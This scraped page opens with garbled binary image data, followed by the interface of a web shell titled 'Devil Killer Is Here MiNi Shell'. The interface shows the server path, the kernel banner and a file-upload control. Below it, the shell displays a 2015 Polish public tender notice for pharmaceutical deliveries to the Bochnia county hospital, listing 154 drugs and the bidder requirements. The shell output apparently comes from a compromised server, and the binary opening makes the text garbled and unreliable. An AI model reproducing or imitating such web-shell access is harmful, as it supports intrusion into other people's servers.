JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150113/4703-N-2015.html

<p class="kh_header"><b>Bochnia: Dostawa produktów farmaceutycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I)</b><br>
<b>Numer ogłoszenia: 4703 - 2015; data zamieszczenia: 13.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Bochni "Szpital Powiatowy" im. bł. Marty Wieckiej , ul. Krakowska 31, 32-700 Bochnia, woj. małopolskie, tel. 14 6153201, 6153233, 50979196, faks 14 6153202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bochnia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów farmaceutycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa produktów farmaceutycznych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Bochni Szpital Powiatowy im. bł. Marty Wieckiej (I) (Pakiet nr 1 (27) - Leki posiadające ceny urzędowe - nie rozstrzygnięty w postępowaniu DZ-271-1-38/2014)
Lp.	Opis przedmiotu zamówienie 	Dawka / opakowanie	Jednostka miary	Ilość jednostek miary
				zamawiana 
(wg. wielkości dawki/opakowania określonego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Azitromycinum	kaps 250 mg x 6	op.	2
2.	Azitromycinum	tabl powl 500 mg x 3	op.	144
3.	Cefuroxime axetil	 pr.d/sporz.zaw 125mg/5ml 50ml	op.	2
4.	Cefuroxime axetil	 pr.d/sporz.zaw. 250mg/5ml 50ml	op.	6
5.	Ciprofloxacin        	tabl.pow. 0,5  g x 10	op.	270
6.	Clarithromycin	 susp. 125mg/5ml 100ml x 1	op.	2
7.	Clarithromycin	 susp. 250mg/5ml 100ml x 1	op.	14
8.	Clarithromycin	tabl.500 mg x 14	op.	5
9.	Clindamycin 	caps.0,15g x 16	op.	5
10.	Colistin	fiol. 1Mj.m. x 20	op.	21
11.	Erythromycin 	 tabl 0.2 g  x 16	op.	7
12.	Furagin 	 tabl 0.05g x 30	op.	195
13.	Gentamicin	krople do oczu 0,3% x 5 ml	op.	1
14.	Gentamicin	 amp 0.08/2ml  x 10   dożylna 	op.	60
15.	Spiramycin	tabl.  3 mln x 10	op.	15
16.	Cefuroxime  	amp 1500 mg x1	op.	8600
17.	Cefuroxime  	amp 750 mg x 1	op.	1670
18.	Aciclovir	tabl.400 mg x 30	op.	1
19.	Aciclovir	tabl. 800 mg x 30	op.	3
20.	Allopurinolum                            	tabl.  0.1 g x 50	op.	50
21.	Amiodarone                                  	tabl  0.2 g x 60	op.	11
22.	Atropinum sulfuricum  	krople do oczu 1% x 5 ml	op.	2
23.	Captopril   	tabl.  12,5mg  x 30	op.	66
24.	Captopril   	tabl.  25mg x 30	op.	145
25.	Carbamazepine 	tabl.  0.2 g x 50	op.	74
26.	Cetirizine	1% krople doustne fl. 10 ml	op.	6
27.	Clotrimazolum 	tabl vag. 0,5 mg x 1	op.	127
28.	Clotrimazolum 	tbl vag. 100mg  x 6	op.	43
29.	Clozapine	tabl. 25 mg x 50	op.	2
30.	Desmopressin 	fl. 5 ml aerozol do nosa                                           /1 dawka zawiera 10?g /x1	op.	3
31.	Diclofenac	tabl. 100mg  x 20	op.	3
32.	Enalapril	tabl.  5mg x 60	op.	7
33.	Enalapril                                       	tabl. 10mg x 60	op.	3
34.	Fluconazole 	kaps 100 mg x 28	op.	41
35.	Fluticasone	aerozol wziewny 0,250 mg x 60 dawek	op.	10
36.	Furosemide	tabl.  0.04g x 30	op.	265
37.	Glucagon	fiol. 1 mg + rozp.	op.	4
38.	Ipratropium bromide	fl.10 ml -aerozol do inhalacji/ 200 dawek	op.	2
39.	Ipratropium bromide	roztwór do inhalacji 0,25 mg/ml 20 ml	op.	1
40.	Lacidipine	tabl. 4 mg x 28 	op.	78
41.	Levodopa	  62,5 mg x 100 kaps.	op.	3
42.	Levothyroxine sodium 	tabl. 0,05 mg  x 50	op.	60
43.	Lisinopril 	tabl.10 mg x 28	op.	158
44.	Lisinopril 	tabl.5 mg x 28	op.	37
45.	Losartan / sól potasowa/	tabl. 50 mg x 28	op.	38
46.	Mesalazine 	czopki 500 mg x 30	op.	2
47.	Metoprolol	tabl.  0.05 g  x 30	op.	325
48.	Paroxetinum	tabl.powl. 20 mg x 30	op.	5
49.	Pantoprazole	tabl. 20 mg   x 28	op.	525
50.	Pantoprazole	tabl. 40 mg  x 28	op.	375
51.	Pilocarpine hydrochloride	krople do oczu  2 %  - 2 x 5 ml 	op.	5
52.	Potassium chloride	tbl.prolong. 0,75g  x 60	op.	305
53.	Propafenone  	tabl. 0,3 g   x 20	op.	90
54.	Salmeterol 	25 mcg x 120 dawek /aerosol/	op.	10
55.	Sertraline	tabl. pow.50 mg x 28	op.	51
56.	Theophylline 	tabl.prolong 150 mg  x 50	op.	48
57.	Theophylline 	tabl.prolong 300 mg  x 50	op.	24
58.	Timolol 	krople do oczu 0,5 %  -  5 ml	op.	16
59.	Tramadol	krople  0,1g/1ml - 10ml x 1	op.	13
60.	Tramadol	krople  0,1g/1ml - 96ml x 1	op.	4
61.	Tramadol	tabl. 0,05g   x 20	op.	395
62.	Tramadol	tabl. 0,1g   x 30	op.	48
63.	Tramadol	amp .100mg -  2ml  x 5	op.	1260
64.	Tramadol	amp .50mg -  1ml   x 5	op.	212
65.	Isosorbide mononitrate	tabl.o przedłużonym uwalnianiu 100 mg x 30	op.	2
66.	Diltiazem hydrochloride	tabl.powl. o przedłużonym uwalnianiu 120 mg x 30	op.	5
67.	Quinapril 	tabl. powl.20mg x30	op.	1
68.	Acarbose	tabl  a 0,1g x 30	op.	4
69.	Acenocumarol 	tabl  0.004 x 60	op.	27
70.	Amlodypine 	tabl  5 mg x 30	op.	16
71.	Amlodypine 	tabl  10 mg x 30	op.	10
72.	Betamethasone /sól disodowa fosforanu betametazonu	amp 4 mg/1ml	op.	1380
73.	Bromocriptine	tabl 2,5 mg x 30	op.	6
74.	Budesonide 	zawiesina do inhalacji z nebulizatora 1 ml zawiera 500?g- op. x 20 poj. po 2 ml	op.	95
75.	Cetirizine	tabl .powl.10 mg x 20	op.	6
76.	Chloropromazine  	krople 4% - 10 g  x 1	op.	15
77.	Cilazapril	tabl 2,5 mg x 30	op.	2
78.	Cilazapril	tabl 5 mg x 30	op.	3
79.	Co-Trimoxazole	 zaw 0,24 g / 5 ml/ 100 ml 	op.	1
80.	Co-Trimoxazole	 tabl 960  x 10	op.	272
81.	Cyanocobalamin  -Vitaminum B12 	amp 1000mcg/2ml x 5	op.	13
82.	Dexamethasone 	tabl 0.001g x 20	op.	31
83.	Digoxin	tabl  0,1 mg x 30	op.	28
84.	Digoxin    	tabl  0.25mg  x 30	op.	6
85.	Epinephrine 	amp 0.001g/1ml x 10	op.	190
86.	Fenoterol hydrobromide	aerozol wziewny r-r 100 mg/dawkę 10 ml - 200 dawek	op.	8
87.	Folic acid	tabl  0.005 g x 30	op.	61
88.	Folic acid	tabl  0.015 g x 30	op.	28
89.	Glyceryl trinitrate	aerozol - 0,4 mg - 200 dawek x 1	op.	35
90.	Haloperidol	krople  0,2 % -10 ml  x 1	op.	14
91.	Haloperidol                    	tabl a 0,001g x 40	op.	45
92.	Hydrochlorothiazide + amiloride /Tialorid/	tabl.50 mg + 5 mg x 50	op.	12
93.	Hydrocortisone 	krem 1%  15g x 1	op.	21
94.	Ipratropium  Bromide  + Fenoteroli Hydrobromide /Berodual/	krople 20ml płyn do inh 0,25 mg + 0,5mg / 1ml	op.	216
95.	Isosorbide Mononitrate	tabl  - retard 60 mg x 30	op.	32
96.	Lignocainum h/ch cum noradrenalina 	amp 20 mg + 0,025 mg/ ml amp 2 ml x 10	op.	15
97.	Loperamide	tabl  2mg x 30	op.	7
98.	Metformin	tabl  0.85 g x 60	op.	48
99.	Metformin	tabl  0.5g x 60	op.	46
100.	Metformin XR	tabl - retard 750 mg x 30	op.	5
101.	Methylprednisolone	tabl . 0,016g x 30	op.	76
102.	Mianserin	tabl. 0.01 g x 30	op.	40
103.	Naproxen	tabl 500 mg x 20	op.	8
104.	Naproxen	tabl  0,25 g x 50	op.	3
105.	Pancreatin	kaps.dojelitowe 25 tyś.J.Ph.Eur. x 50	op.	4
106.	Pernazine	tabl  0.1 g x 30 	op.	8
107.	Pernazine	tabl  0.025 g x 50 	op.	225
108.	Phytomenadione 	tabl a 0,01g x 30	op.	8
109.	Prednisone  	tabl. 5 mg x 20 !!	op.	8
110.	Prednisone  	tabl . 20 mg x20 !!	op.	12
111.	Prednisone  	tabl. 10 mg x 20 !!	op.	20
112.	Propranolol	tabl 0.04g x 50	op.	8
113.	Salbutamol 	 aerozol 0,1mg/200dawek	op.	1
114.	Salbutamol 	amp. 5 mg/2,5 ml x 20-roztwór nebulizacji	op.	30
115.	Spironolactone  	tabl 0,1g x 20	op.	188
116.	Sulfasalazine	tabl  0.5g tabletki dojelitowe x 100(EN)	op.	20
117.	Thiethylperazine 	czopki  6.5mg x 6	op.	35
118.	Thiethylperazine 	tabl.6,5 mg x 50	op.	13
119.	Ticlopidine	tabl 250 mg x 60	op.	1
120.	Tropicamide	krople 0.5% - 2x5ml x 1	op.	5
121.	Tropicamide 	krople 1% - 2x5ml x 1	op.	80
122.	Verapamil  	tabl.40 mg x 20	op.	210
123.	Ondansetron	2 mg/ml - 4 ml x 5	op.	18
124.	Clonazepam	tabl. 2 mg x 30	op.	35
125.	Risperidone	tabl. 2 mg x 60	op.	48
126.	Progesterone	tabl. 50 mg x 30 / podęzykowe /	op.	5
127.	Progesterone	tabl. 50 mg x 30 /dopochwowe/	op.	16
128.	Biperidenum	tabl. 2 mg x 50	op.	1
129.	Nitrendipine	tabl. 10 mg x 30	op.	1
130.	Doxepin	kaps 25 mg x 30	op.	14
131.	Sucralfate	zawiesina doustna 1g/5ml 250ml	op.	8
132.	Carbamazepine retard	tabl 600mg x 50	op.	10
133.	Quetiapinum	tabl powl 25mg x 30	op.	3
134.	Telmisartan + Hydrochlorotiazid	tabl 40mg + 12,5mg x 56	op.	2
135.	Telmisartan + Hydrochlorotiazid	tabl 80mg + 12,5mg x 56	op.	2
136.	Telmisartan + Hydrochlorotiazid	tabl 80mg + 25mg x 56	op.	2
137.	Valsartan + Hydrochlorothiazid	tabl 80mg + 12,5mg x 28	op.	2
138.	Valsartan + Hydrochlorothiazid	tabl 160mg + 12,5mg x 28	op.	2
139.	Valsartan + Hydrochlorothiazid	tabl 160mg + 25mg x 28	op.	5
140.	Valsartan + Hydrochlorothiazid	tabl 320mg + 12,5mg x 28	op.	2
141.	Valsartan 	tabl powl 80mg x 28	op.	2
142.	Valsartan 	tabl powl 160mg x 28	op.	5
143.	Valsartan 	tabl powl 320mg x 28	op.	2
144.	Telmisartan 	tabl 40mg x 28	op.	2
145.	Telmisartan	tabl 80mg x 28	op.	5
146.	Rivaroxaban	tabl powl 10mg x 10	op.	3
147.	Rivaroxaban	tabl powl 15mg x 42	op.	2
148.	Rivaroxaban	tabl powl 20mg x 14	op.	4
149.	Ezetimibe	tabl 10mg x 28	op.	1
150.	Indapamide	tabl powl 2,5mg x 20	op.	10
151.	Warfarin	tabl 3mg x 100	op.	3
152.	Warfarin	tabl 5mg x 100	op.	3
153.	Formoterolum	proszek do inhalacji w kapsułkach 0,012mg x 60 + inhalator	op.	50
154.	Midazolam    	tabl.7,5 mg x10 	op.	25.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. zezwolenia na prowadzenie hurtowni farmaceutycznej wydanego przez Głównego Inspektora Farmaceutycznego lub zezwolenie na wytwarzanie produktów leczniczych (w przydatku producenta) wydane przez Głównego Inspektora Farmaceutycznego zgodnie z wymogami ustawy z dnia 6 września 2001r. Prawo Farmaceutyczne (Dz. U. z 2008r., Nr 45, poz. 271 ze zm.),
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę dokument, o którym mowa w punkcie III.4.1) ppkt. 1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże posiadanie wiedzy i doświadczenia rozumianej jako zasób umiejętności, praktykę i wprawę, wyrażające się w wykonaniu co najmniej dwóch dostaw w zakresie przedmiotu zamówienia (produktów farmaceutycznych) przez Wykonawcę składającego ofertę na jeden pakiet, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, każda z dostaw odpowiadająca wartością brutto 109 000,00 zł. W przypadku dostaw wykonywanych (tj. rozpoczętych, a nie zakończonych) na poczet wymaganej wiedzy i doświadczenia będzie zaliczona wyłącznie jej zrealizowana część. Tylko wartość tej części może być przez Wykonawcę wykazania na poczet wymaganej dla celów wykazania spełnienia warunków posiadania wiedzy i doświadczenia.
Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawiony przez Wykonawcę wykaz, o którym mowa w punkcie III.4.1) ppkt 2). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceniać będzie spełnienie tego warunku, w oparciu o przedstawione przez Wykonawcę oświadczenie, o którym mowa w punkcie III.4.1). Ocena spełnienia tego warunku będzie dokonana na zasadzie formalnej spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">III.5.1)	Oświadczenie, że wszystkie pozycje, stanowiące przedmiot zamówienia, które tego wymagają, zawarte w FORMULARZU ASORTYMENTOWO-CENOWYM, stanowiącym ZAŁĄCZNIK do oferty, spełniają wymagania przewidziane w  ustawie z dnia 6 września 2001r. Prawo Farmaceutyczne (tekst jednolity Dz. U. z 2004r nr 53, poz. 533) oraz w ustawie o wyrobach medycznych z dnia 20  maja 2010 r. (Dz. U. z 2010 nr 107 poz. 679), a także w obowiązujących przepisach Unii Europejskiej oraz że Wykonawca posiada odpowiednie aktualne dokumenty na potwierdzenie spełnienia powyższych wymagań, a także zobowiązuje się na pisemne wezwanie Zamawiającego, przedłożyć stosowne dokumenty w wyznaczonym terminie przez Zamawiającego. W przypadku dokumentów sporządzonych w języku obcym, przedłoży je wraz z tłumaczeniem na język polski sporządzonym przez tłumacza przysięgłego (zawarte w załączniku nr 7)
III.5.2)	Oświadczenia, że ceny zaproponowane w postępowaniu na refundowane produkty: leki, środki spożywcze specjalnego przeznaczenia żywieniowego i wyroby medyczne, są nie wyższe niż te wynikające z regulacji art. 9 ust. 1 i 2 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (Dz.U.  Nr 122, poz. 696 z późn. zm.) (zawarte w załączniku nr 8)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1)	W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwa. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. Kserokopia pełnomocnictwa musi być poświadczona przez notariusza.
